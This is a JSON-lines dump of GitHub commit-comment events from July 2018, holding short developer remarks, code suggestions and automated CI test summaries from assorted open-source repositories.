{"id":"8019344625","type":"CommitCommentEvent","actor":{"login":"songaal"},"repo":{"name":"gncloud/fastcatsearch3"},"payload":{"comment":{"id":29836274,"position":41,"line":91,"path":"server/src/main/java/org/fastcatsearch/job/management/UpdateCollectionConfigJob.java","commit_id":"1476b7edb91d749882a21eac8bc928af07e39433","created_at":"2018-07-25T22:19:39Z","updated_at":"2018-07-25T22:19:39Z","author_association":"MEMBER","body":"데이터 노드에 컬렉션이 이미존재하는 경우 초기화되는 버그..."}},"created_at":"2018-07-25T22:19:39Z"}
{"id":"8019351136","type":"CommitCommentEvent","actor":{"login":"Vizvezdenec"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29836296,"position":null,"line":null,"path":null,"commit_id":"a45ec3c750d72408b35d35cfabe30e962e65b4c5","created_at":"2018-07-25T22:21:29Z","updated_at":"2018-07-25T22:21:29Z","author_association":"NONE","body":"Yeah this probably is the best way to go. Since \"scaling\" isn't actually measured by SPRT anyway, so this stuff can and probably should be tried."}},"created_at":"2018-07-25T22:21:29Z"}
{"id":"8019351690","type":"CommitCommentEvent","actor":{"login":"pawosm-arm"},"repo":{"name":"flang-compiler/flang"},"payload":{"comment":{"id":29836298,"position":null,"line":null,"path":null,"commit_id":"7da0254f387a2e10abbf0b6689c62528c6c1bade","created_at":"2018-07-25T22:21:38Z","updated_at":"2018-07-25T22:21:38Z","author_association":"CONTRIBUTOR","body":"My point is that after applying this patch, we're loosing some of the benefits introduced by pull request #401. E.g. test case debug_module_variables_misc.f90 introduced by our pull request will start to fail after applying the above patch.\r\nThis testcase has a module with four variables with names `outpatch_table`, `patch_count`, `dims`, `val2`. Previously, there were entries for the four variables. After this patch there are entries for only three with the entry for patch_count missing as given below.\r\n```\r\n@mod_vars2_0 = global %struct_mod_vars2_0_ zeroinitializer, align 128, !dbg !28, !dbg !31, !dbg !36\r\n!28 = !DIGlobalVariableExpression(var: !29, expr: !DIExpression(DW_OP_constu, 144, DW_OP_plus))\r\n!29 = distinct !DIGlobalVariable(name: \"outpatch_table\", scope: !30, file: !4, type: !10, isLocal: false, isDefinition: true)\r\n!31 = !DIGlobalVariableExpression(var: !32, expr: !DIExpression(DW_OP_constu, 304, DW_OP_plus))\r\n!32 = distinct !DIGlobalVariable(name: \"dims\", scope: !30, file: !4, type: !33, isLocal: false, isDefinition: true)\r\n!36 = !DIGlobalVariableExpression(var: !37, expr: !DIExpression(DW_OP_constu, 312, DW_OP_plus))\r\n!37 = distinct !DIGlobalVariable(name: \"val2\", scope: !30, file: !4, type: !13, isLocal: false, isDefinition: true)\r\n```\r\n"}},"created_at":"2018-07-25T22:21:38Z"}
{"id":"8019357841","type":"CommitCommentEvent","actor":{"login":"shkeeler"},"repo":{"name":"shkeeler/vpp-docs"},"payload":{"comment":{"id":29836315,"position":null,"line":null,"path":null,"commit_id":"429ec8ab31c16126747408f9581d491d51a4e5a0","created_at":"2018-07-25T22:23:21Z","updated_at":"2018-07-25T22:23:21Z","author_association":"OWNER","body":"Updated the topology diagram"}},"created_at":"2018-07-25T22:23:21Z"}
{"id":"8019379327","type":"CommitCommentEvent","actor":{"login":"me4502"},"repo":{"name":"sk89q/WorldEdit"},"payload":{"comment":{"id":29836379,"position":null,"line":null,"path":null,"commit_id":"8f6ccf14ca33bb59fd830def48afbdd7c9636c43","created_at":"2018-07-25T22:29:27Z","updated_at":"2018-07-25T22:29:27Z","author_association":"COLLABORATOR","body":"That’s not a bug, read the first line."}},"created_at":"2018-07-25T22:29:27Z"}
{"id":"8019382999","type":"CommitCommentEvent","actor":{"login":"DaaseAllan"},"repo":{"name":"Kroqh/Poelsemix"},"payload":{"comment":{"id":29836392,"position":null,"line":null,"path":null,"commit_id":"6ce49ca0dd8e321720cf12060abe98a563f60882","created_at":"2018-07-25T22:30:32Z","updated_at":"2018-07-25T22:30:32Z","author_association":"COLLABORATOR","body":"hvad fuck"}},"created_at":"2018-07-25T22:30:32Z"}
{"id":"8019385382","type":"CommitCommentEvent","actor":{"login":"anselmbradford"},"repo":{"name":"eslint/eslint"},"payload":{"comment":{"id":29836394,"position":null,"line":null,"path":null,"commit_id":"551335eedf62261299af7aafdfc896b3aef8de67","created_at":"2018-07-25T22:31:12Z","updated_at":"2018-07-25T22:31:12Z","author_association":"CONTRIBUTOR","body":"@michaelficarra Thanks! That makes sense."}},"created_at":"2018-07-25T22:31:12Z"}
{"id":"8019388303","type":"CommitCommentEvent","actor":{"login":"matukaa"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29836402,"position":null,"line":null,"path":null,"commit_id":"aab605b9448a24d03287f512a5fe28adb1b54963","created_at":"2018-07-25T22:32:02Z","updated_at":"2018-07-25T22:32:02Z","author_association":"NONE","body":"Well yeah, it will change in BFA, but you don't want to apply the aura before the cast anyway, since it has SPELL_AURA_IGNORE_SPELL_COOLDOWN. This will remove cooldown client-side for the duration of that aura, and allow server-side checks to ignore the CD when you are recasting the spell. And to make it even better, if you're mid-channel when that aura runs out, the client will automatically send CMSG_CANCEL_AURA to interrupt the channel, so everything works automatically :D "}},"created_at":"2018-07-25T22:32:02Z"}
{"id":"8019389856","type":"CommitCommentEvent","actor":{"login":"luc819"},"repo":{"name":"sk89q/WorldEdit"},"payload":{"comment":{"id":29836405,"position":null,"line":null,"path":null,"commit_id":"8f6ccf14ca33bb59fd830def48afbdd7c9636c43","created_at":"2018-07-25T22:32:27Z","updated_at":"2018-07-25T22:32:27Z","author_association":"NONE","body":"so what is the format now ?\r\n"}},"created_at":"2018-07-25T22:32:27Z"}
{"id":"8019390603","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29836407,"position":null,"line":null,"path":null,"commit_id":"fc91e747b7f09d1a7d95efde55fb7530df2b7809","created_at":"2018-07-25T22:32:40Z","updated_at":"2018-07-25T22:32:40Z","author_association":"NONE","body":"#6712-Zone-Coil-Autosizing-does-not-include-impact-of-AirTerminalSingleDuctMixer (rraustad) - x86_64-MacOS-10.9-clang: OK (2932 of 2948 tests passed, 19 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 26 tests had: EIO diffs.\n * 12 tests had: ESO small diffs.\n * 8 tests had: MTR small diffs.\n * 9 tests had: Table small diffs.\n * 14 tests had: ESO big diffs.\n * 15 tests had: Table big diffs.\n * 5 tests had: ERR diffs.\n * 9 tests had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 607\n * Failed: 16\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc91e747b7f09d1a7d95efde55fb7530df2b7809-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc91e747b7f09d1a7d95efde55fb7530df2b7809-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.46%25-yellow.png)</a> \n"}},"created_at":"2018-07-25T22:32:40Z"}
{"id":"8019391296","type":"CommitCommentEvent","actor":{"login":"Nitimar"},"repo":{"name":"spesmilo/electrum"},"payload":{"comment":{"id":29836410,"position":4,"line":26,"path":"contrib/build-osx/osx.spec","commit_id":"7922df1031b2c4b132f7f9c90232480b5bf9585c","created_at":"2018-07-25T22:32:53Z","updated_at":"2018-07-25T22:32:53Z","author_association":"NONE","body":"hiddenimports += collect_submodules('safetlib')7922df1"}},"created_at":"2018-07-25T22:32:53Z"}
{"id":"8019393613","type":"CommitCommentEvent","actor":{"login":"goller"},"repo":{"name":"influxdata/chronograf"},"payload":{"comment":{"id":29836429,"position":76,"line":2011,"path":"server/swagger.json","commit_id":"96aba5a682ce4860562db39b4b9657a5b5d88a62","created_at":"2018-07-25T22:33:32Z","updated_at":"2018-07-25T22:33:32Z","author_association":"CONTRIBUTOR","body":"Probably add services as a tag as well."}},"created_at":"2018-07-25T22:33:32Z"}
{"id":"8019395344","type":"CommitCommentEvent","actor":{"login":"szopenq"},"repo":{"name":"szpn/szpn.github.io"},"payload":{"comment":{"id":29836431,"position":null,"line":null,"path":null,"commit_id":"1b3df65c1f11a0a92c431c67a87ea37ef99cb418","created_at":"2018-07-25T22:33:59Z","updated_at":"2018-07-25T22:33:59Z","author_association":"NONE","body":"added reset button*"}},"created_at":"2018-07-25T22:33:59Z"}
{"id":"8019396588","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"31m059/Stockfish"},"payload":{"comment":{"id":29836435,"position":null,"line":null,"path":null,"commit_id":"2f84870da41ae1b56d42fcf5bfc5b73010e8f982","created_at":"2018-07-25T22:34:17Z","updated_at":"2018-07-25T22:34:17Z","author_association":"NONE","body":"Interesting extension of my idea.\r\nGood luck!"}},"created_at":"2018-07-25T22:34:17Z"}
{"id":"8019397034","type":"CommitCommentEvent","actor":{"login":"goller"},"repo":{"name":"influxdata/chronograf"},"payload":{"comment":{"id":29836438,"position":null,"line":null,"path":null,"commit_id":"96aba5a682ce4860562db39b4b9657a5b5d88a62","created_at":"2018-07-25T22:34:25Z","updated_at":"2018-07-25T22:34:25Z","author_association":"CONTRIBUTOR","body":"Thank you so much for doing this!"}},"created_at":"2018-07-25T22:34:25Z"}
{"id":"8019402896","type":"CommitCommentEvent","actor":{"login":"Tromador"},"repo":{"name":"eyeonus/EDDBlink-listener"},"payload":{"comment":{"id":29836455,"position":null,"line":null,"path":null,"commit_id":"dfb0f716722ad3067cca82c31f147e4cfcef7b6c","created_at":"2018-07-25T22:36:06Z","updated_at":"2018-07-25T22:36:06Z","author_association":"COLLABORATOR","body":"Also if you really want Python 3.7, then I am going to have to recompile my sandbox, futhermore you can get a native \"side by side\" python 3.6 for Centos 7, which was going to save me having to sandbox it at all once I migrate all services to the new machine - going to 3.7 means I have to recreate it all over again. \r\n\r\ntl;dr - You are maybe creating (possibly unecessary) work for me."}},"created_at":"2018-07-25T22:36:06Z"}
{"id":"8019405128","type":"CommitCommentEvent","actor":{"login":"blshkv"},"repo":{"name":"pentoo/pentoo-overlay"},"payload":{"comment":{"id":29836462,"position":null,"line":null,"path":null,"commit_id":"3851b896e4862b204a9969012cb584a77568c892","created_at":"2018-07-25T22:36:46Z","updated_at":"2018-07-25T22:36:46Z","author_association":"CONTRIBUTOR","body":"How did i break if we unmask them? "}},"created_at":"2018-07-25T22:36:46Z"}
{"id":"8019410907","type":"CommitCommentEvent","actor":{"login":"lzim"},"repo":{"name":"lzim/teampsd"},"payload":{"comment":{"id":29836482,"position":null,"line":null,"path":null,"commit_id":"5eac487c334df15f0c160ae82b7a222cf92dc345","created_at":"2018-07-25T22:38:28Z","updated_at":"2018-07-25T22:38:28Z","author_association":"OWNER","body":"Making this connection today has the potential to be a huge breakthrough for the team. Thanks!"}},"created_at":"2018-07-25T22:38:28Z"}
{"id":"8019410916","type":"CommitCommentEvent","actor":{"login":"eyeonus"},"repo":{"name":"eyeonus/EDDBlink-listener"},"payload":{"comment":{"id":29836483,"position":null,"line":null,"path":null,"commit_id":"dfb0f716722ad3067cca82c31f147e4cfcef7b6c","created_at":"2018-07-25T22:38:28Z","updated_at":"2018-07-25T22:38:28Z","author_association":"OWNER","body":"You can't just upgrade the 3.6 to 3.7?\r\n\r\nWow. If I had known it would cause that must trouble on your part, I wouldn't have done it. I'll revert that bit."}},"created_at":"2018-07-25T22:38:28Z"}
{"id":"8019411639","type":"CommitCommentEvent","actor":{"login":"gcallant"},"repo":{"name":"sk89q/WorldEdit"},"payload":{"comment":{"id":29836485,"position":null,"line":null,"path":null,"commit_id":"8f6ccf14ca33bb59fd830def48afbdd7c9636c43","created_at":"2018-07-25T22:38:42Z","updated_at":"2018-07-25T22:38:42Z","author_association":"NONE","body":"@luc819 It’s going to be switched to the Sponge schematic now. \n\nhttps://github.com/SpongePowered/Schematic-Specification"}},"created_at":"2018-07-25T22:38:42Z"}
{"id":"8019414389","type":"CommitCommentEvent","actor":{"login":"eyeonus"},"repo":{"name":"eyeonus/EDDBlink-listener"},"payload":{"comment":{"id":29836498,"position":null,"line":null,"path":null,"commit_id":"dfb0f716722ad3067cca82c31f147e4cfcef7b6c","created_at":"2018-07-25T22:39:30Z","updated_at":"2018-07-25T22:39:30Z","author_association":"OWNER","body":"I think server is primary. I've been running as client mostly for testing purposes, but I do think people should have the option."}},"created_at":"2018-07-25T22:39:30Z"}
{"id":"8019422222","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29836523,"position":null,"line":null,"path":null,"commit_id":"02ba8e2b4c1a000c09f5300aa40c5a9b4066e09c","created_at":"2018-07-25T22:41:48Z","updated_at":"2018-07-25T22:41:48Z","author_association":"NONE","body":"#6517-MissingEqNumRefsInEngrgRef (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2325 of 2325 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-02ba8e2b4c1a000c09f5300aa40c5a9b4066e09c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-02ba8e2b4c1a000c09f5300aa40c5a9b4066e09c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-02ba8e2b4c1a000c09f5300aa40c5a9b4066e09c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-25T22:41:48Z"}
{"id":"8019422817","type":"CommitCommentEvent","actor":{"login":"kkapsner"},"repo":{"name":"kkapsner/CanvasBlocker"},"payload":{"comment":{"id":29836528,"position":null,"line":null,"path":null,"commit_id":"9a26baf5c1fc35ae3dc6d3af57a8c93cead73cc9","created_at":"2018-07-25T22:41:59Z","updated_at":"2018-07-25T22:41:59Z","author_association":"OWNER","body":"Da meldet mir der Browser ja, wenn ich was falsch geschrieben habe. Aber für den Rest hab' ich ja dich!\r\n\r\nNochmal: Danke."}},"created_at":"2018-07-25T22:41:59Z"}
{"id":"8019427257","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29836537,"position":null,"line":null,"path":null,"commit_id":"02ba8e2b4c1a000c09f5300aa40c5a9b4066e09c","created_at":"2018-07-25T22:43:20Z","updated_at":"2018-07-25T22:43:20Z","author_association":"NONE","body":"#6517-MissingEqNumRefsInEngrgRef (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-02ba8e2b4c1a000c09f5300aa40c5a9b4066e09c-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-25T22:43:20Z"}
{"id":"8019438814","type":"CommitCommentEvent","actor":{"login":"Mark57449"},"repo":{"name":"Mark57449/DietaTCC"},"payload":{"comment":{"id":29836570,"position":null,"line":null,"path":null,"commit_id":"8847d8634eb26a00dfe5a096c4002733567e5899","created_at":"2018-07-25T22:46:55Z","updated_at":"2018-07-25T22:46:55Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Pré-projeto + Referências](https://trello.com/c/CcXbBJ4E/17-pr%C3%A9-projeto-refer%C3%AAncias)"}},"created_at":"2018-07-25T22:46:55Z"}
{"id":"8019440237","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29836576,"position":null,"line":null,"path":null,"commit_id":"105d8b03fc32baf6d784246bc33cdcd5c524372d","created_at":"2018-07-25T22:47:23Z","updated_at":"2018-07-25T22:47:23Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-281](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-281).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-281-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-25T22:47:23Z"}
{"id":"8019441685","type":"CommitCommentEvent","actor":{"login":"lesm"},"repo":{"name":"litodertechie/rails_listy"},"payload":{"comment":{"id":29836581,"position":null,"line":null,"path":null,"commit_id":"649b951bf7b7e2b33e0a57667c55cfb331726168","created_at":"2018-07-25T22:47:52Z","updated_at":"2018-07-25T22:47:52Z","author_association":"COLLABORATOR","body":"of course, with all confidence you can contact me. "}},"created_at":"2018-07-25T22:47:52Z"}
{"id":"8019443148","type":"CommitCommentEvent","actor":{"login":"chalin"},"repo":{"name":"dart-lang/pub_semver"},"payload":{"comment":{"id":29836585,"position":6,"line":6,"path":".travis.yml","commit_id":"7b2549d1f57d9311f5525c761ce7627bdb6e6d27","created_at":"2018-07-25T22:48:20Z","updated_at":"2018-07-25T22:48:20Z","author_association":"CONTRIBUTOR","body":"Done #33"}},"created_at":"2018-07-25T22:48:20Z"}
{"id":"8019443809","type":"CommitCommentEvent","actor":{"login":"VizuaaLOG"},"repo":{"name":"jgthms/bulma"},"payload":{"comment":{"id":29836587,"position":null,"line":null,"path":null,"commit_id":"48c73101e71234c22e9e7d88c3046ed8abaae6e9","created_at":"2018-07-25T22:48:33Z","updated_at":"2018-07-25T22:48:33Z","author_association":"CONTRIBUTOR","body":"This would also close the issue I have open currently #1901 I never did get round to doing a PR for it :P"}},"created_at":"2018-07-25T22:48:33Z"}
{"id":"8019445968","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"31m059/Stockfish"},"payload":{"comment":{"id":29836596,"position":null,"line":null,"path":null,"commit_id":"2f84870da41ae1b56d42fcf5bfc5b73010e8f982","created_at":"2018-07-25T22:49:13Z","updated_at":"2018-07-25T22:49:13Z","author_association":"NONE","body":"I would propose to rewrite this more general so that also multiple queens covered. This simplifies also the code.\r\n\r\nDo in initialize only `queenBlockers[Us] = 0;` and replace the current code in pieces with:\r\n```\r\n            queenBlockers[Us] |= b = pos.slider_blockers(pos.pieces(Them, ROOK, BISHOP), s, queenPinners);\r\n            if (b)\r\n                score -= WeakQueen;\r\n```\r\n"}},"created_at":"2018-07-25T22:49:13Z"}
{"id":"8019446692","type":"CommitCommentEvent","actor":{"login":"Tromador"},"repo":{"name":"eyeonus/EDDBlink-listener"},"payload":{"comment":{"id":29836600,"position":null,"line":null,"path":null,"commit_id":"dfb0f716722ad3067cca82c31f147e4cfcef7b6c","created_at":"2018-07-25T22:49:27Z","updated_at":"2018-07-25T22:49:27Z","author_association":"COLLABORATOR","body":"No - CentOS is stuck in Python 2 land. The package manager depends on it, so if you aren't super careful what you do with any side by side install of Python, you can completely break the OS. Even the new CentOS  v 7.5 is stuck with Python 2.\r\n\r\nSo I can't easily upgrade, without recompiling the environment from sourcecode. \r\n\r\nOnce I migrate to the new server, then someone has rolled an RPM I can use to have Python 2 & 3 side by side, but I'd still need the shebang and it's still 3.6.\r\n\r\nI guess you had no reason to know - sorry if I seemed pissy :) I just looked and went into panic mode. Amazing how a tiny thing can make such a difference.\r\n\r\nReally Centos (well let's face it, Redhat) need to get with the program and run with Python 3.x as the standard OS python install, but I suspect they don't want to have to rewrite the package manager  to cope.\r\n\r\nHell, you can't even upgrade from Centos 6 to Centos 7 any more (there used to be a tool), because half way through it upgrades a library which also stops the (ever sensitive) package manager from working and then you get an unusable half upgraded system for your trouble."}},"created_at":"2018-07-25T22:49:27Z"}
{"id":"8019453140","type":"CommitCommentEvent","actor":{"login":"satmandu"},"repo":{"name":"andreiw/raspberry-pi3-atf"},"payload":{"comment":{"id":29836623,"position":null,"line":null,"path":null,"commit_id":"11c9a950ea89a753e473c8b66d6cfe23e9ce7e42","created_at":"2018-07-25T22:51:26Z","updated_at":"2018-07-25T22:51:26Z","author_association":"NONE","body":"@andreiw I was in no way impugning your work, or the scope of your project, which I think is laudable. I agree that it seems that a secure setup with the RPi is neither viable nor possible in its current incarnation due to a multitude of factors. In the larger sense, it makes no sense for me to nitpick one small hole in a deeply problematic security surface.\r\n\r\nI think you put it best as a usefully cheap device for tinkering with code which will be implemented on better hardware.\r\n\r\nHopefully the RPi foundation can be nudged towards fixing some of those platform issues with their next iteration, as the device is being used widely, and not just for hobby use.\r\n\r\nThanks again."}},"created_at":"2018-07-25T22:51:26Z"}
{"id":"8019459995","type":"CommitCommentEvent","actor":{"login":"k3yavi"},"repo":{"name":"10XGenomics/rust-debruijn"},"payload":{"comment":{"id":29836639,"position":14,"line":213,"path":"src/test.rs","commit_id":"953c84b9501ac09a332e95a687552271c3377113","created_at":"2018-07-25T22:53:38Z","updated_at":"2018-07-25T22:53:38Z","author_association":"COLLABORATOR","body":"Some of the unit tests are failing with this commit. Is `Box` a reasonable thing to do here ?"}},"created_at":"2018-07-25T22:53:38Z"}
{"id":"8019463630","type":"CommitCommentEvent","actor":{"login":"eyeonus"},"repo":{"name":"eyeonus/EDDBlink-listener"},"payload":{"comment":{"id":29836646,"position":null,"line":null,"path":null,"commit_id":"dfb0f716722ad3067cca82c31f147e4cfcef7b6c","created_at":"2018-07-25T22:54:48Z","updated_at":"2018-07-25T22:54:48Z","author_association":"OWNER","body":"That's pretty crap. Reverted."}},"created_at":"2018-07-25T22:54:48Z"}
{"id":"8019465159","type":"CommitCommentEvent","actor":{"login":"Tromador"},"repo":{"name":"eyeonus/EDDBlink-listener"},"payload":{"comment":{"id":29836652,"position":null,"line":null,"path":null,"commit_id":"dfb0f716722ad3067cca82c31f147e4cfcef7b6c","created_at":"2018-07-25T22:55:17Z","updated_at":"2018-07-25T22:55:17Z","author_association":"COLLABORATOR","body":"We are mostly on the same page. Testing aside, I think people should only\never be using the client if the server isn't available - though honestly I\ndon't really know the ins and outs of it.\nI'll ask Bernd for more information.\n\nOn Wed, 25 Jul 2018 at 23:39, Jonathan Jones <notifications@github.com>\nwrote:\n\n> I think server is primary. I've been running as client mostly for testing\n> purposes, but I do think people should have the option.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/eyeonus/EDDBlink-listener/commit/dfb0f716722ad3067cca82c31f147e4cfcef7b6c#commitcomment-29836498>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AlJsLFU6Au9F9b6awIkrNHiX9PTY99Y3ks5uKPOigaJpZM4Vg5Hx>\n> .\n>\n\n\n-- \nOmnia dicta fortiora si dicta Latina!\n"}},"created_at":"2018-07-25T22:55:17Z"}
{"id":"8019465761","type":"CommitCommentEvent","actor":{"login":"lzim"},"repo":{"name":"lzim/teampsd"},"payload":{"comment":{"id":29836655,"position":5,"line":32,"path":"model_workgroup/models/agg_v11_2018_06_25_lzedits.mdl","commit_id":"5eac487c334df15f0c160ae82b7a222cf92dc345","created_at":"2018-07-25T22:55:29Z","updated_at":"2018-07-25T22:55:29Z","author_association":"OWNER","body":"**Team PSD/MTL Standard Abbreviations for Units**\r\n% = pct\r\nPatients = pts\r\nPatients per week = ppw\r\nAppointments = appt\r\nAppointments per week = apw\r\nWeeks = wks\r\nWeek = wk\r\nPoints = pnts\r\nHours per week = hpw\r\nHours = hrs"}},"created_at":"2018-07-25T22:55:29Z"}
{"id":"8019466312","type":"CommitCommentEvent","actor":{"login":"CPalmer-IDM"},"repo":{"name":"InstituteforDiseaseModeling/Data_paper_new"},"payload":{"comment":{"id":29836657,"position":null,"line":null,"path":null,"commit_id":"365f1801943de26963f6e61223d0e652406f3c9d","created_at":"2018-07-25T22:55:39Z","updated_at":"2018-07-25T22:55:39Z","author_association":"COLLABORATOR","body":"I also adjusted the model to more accurately reflect screening\r\n"}},"created_at":"2018-07-25T22:55:39Z"}
{"id":"8019467047","type":"CommitCommentEvent","actor":{"login":"Grumbel"},"repo":{"name":"SuperTux/supertux"},"payload":{"comment":{"id":29836660,"position":null,"line":null,"path":null,"commit_id":"33e708fb517079d37ba10ca3714b717625aa1354","created_at":"2018-07-25T22:55:52Z","updated_at":"2018-07-25T22:55:52Z","author_association":"MEMBER","body":"Going up to 1368x800 might be doable, the enemy spawn is relative to Tux and Tux rarely is that close to the edge of the screen. Tux can get pretty close to the screen at the start of the level, but as he doesn't spawn right on the edge that might be harmless.\r\n\r\nSomebody has to build a test level and see what happens."}},"created_at":"2018-07-25T22:55:52Z"}
{"id":"8019468180","type":"CommitCommentEvent","actor":{"login":"juhlee-microsoft"},"repo":{"name":"LIS/LISAv2"},"payload":{"comment":{"id":29836669,"position":5,"line":96,"path":"Testscripts/Linux/perf_fio.sh","commit_id":"ca26118f97e8e244df0fd7342d66019947bfa924","created_at":"2018-07-25T22:56:14Z","updated_at":"2018-07-25T22:56:14Z","author_association":"COLLABORATOR","body":"It does not make sense with new location. Also compare to SLES15 repo location, it should not change."}},"created_at":"2018-07-25T22:56:14Z"}
{"id":"8019469871","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29836686,"position":null,"line":null,"path":null,"commit_id":"292cbdd8ba5c5a86adfdace334a4a7371c0678d2","created_at":"2018-07-25T22:56:50Z","updated_at":"2018-07-25T22:56:50Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-403](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-403).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-403-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-25T22:56:50Z"}
{"id":"8019475054","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29836708,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-25T22:58:31Z","updated_at":"2018-07-25T22:58:31Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-25T22:58:31Z"}
{"id":"8019481990","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29836735,"position":null,"line":null,"path":null,"commit_id":"5c85ed64fb4492a0d0a1c197b246208afcd1ad34","created_at":"2018-07-25T23:00:44Z","updated_at":"2018-07-25T23:00:44Z","author_association":"NONE","body":"158069813_#5675 (Nigusse) - i386-Windows-7-VisualStudio-14: OK (2948 of 2948 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5c85ed64fb4492a0d0a1c197b246208afcd1ad34-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5c85ed64fb4492a0d0a1c197b246208afcd1ad34-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-25T23:00:44Z"}
{"id":"8019486117","type":"CommitCommentEvent","actor":{"login":"murny"},"repo":{"name":"ualbertalib/pushmi_pullyu"},"payload":{"comment":{"id":29836744,"position":null,"line":null,"path":null,"commit_id":"54e1f7184807b69647fc78a4760288404a70b0a4","created_at":"2018-07-25T23:01:57Z","updated_at":"2018-07-25T23:01:57Z","author_association":"MEMBER","body":"@weiweishi\r\n\r\nThis one worked. It was just a different cop failing.... Can't have empty white space at the end of a class:\r\n\r\nhttps://travis-ci.org/ualbertalib/pushmi_pullyu/jobs/408278811\r\n\r\n"}},"created_at":"2018-07-25T23:01:57Z"}
{"id":"8019488836","type":"CommitCommentEvent","actor":{"login":"ksaj"},"repo":{"name":"git-forge/fraudulent"},"payload":{"comment":{"id":29836753,"position":null,"line":null,"path":null,"commit_id":"e80e3ce1980addb2eeec6ad414764ddecf45f23a","created_at":"2018-07-25T23:02:48Z","updated_at":"2018-07-25T23:02:48Z","author_association":"CONTRIBUTOR","body":"_Wow_ this thing predicted the exact set of changes I would have committed before I got a chance to do it myself!"}},"created_at":"2018-07-25T23:02:48Z"}
{"id":"8019491351","type":"CommitCommentEvent","actor":{"login":"hanpm"},"repo":{"name":"gwcblizzard2018/HAKKers"},"payload":{"comment":{"id":29836762,"position":null,"line":null,"path":null,"commit_id":"04591acb1e7429d587aa38ff140555263e4e1299","created_at":"2018-07-25T23:03:32Z","updated_at":"2018-07-25T23:03:32Z","author_association":"CONTRIBUTOR","body":"this is .css for the camera stuff"}},"created_at":"2018-07-25T23:03:32Z"}
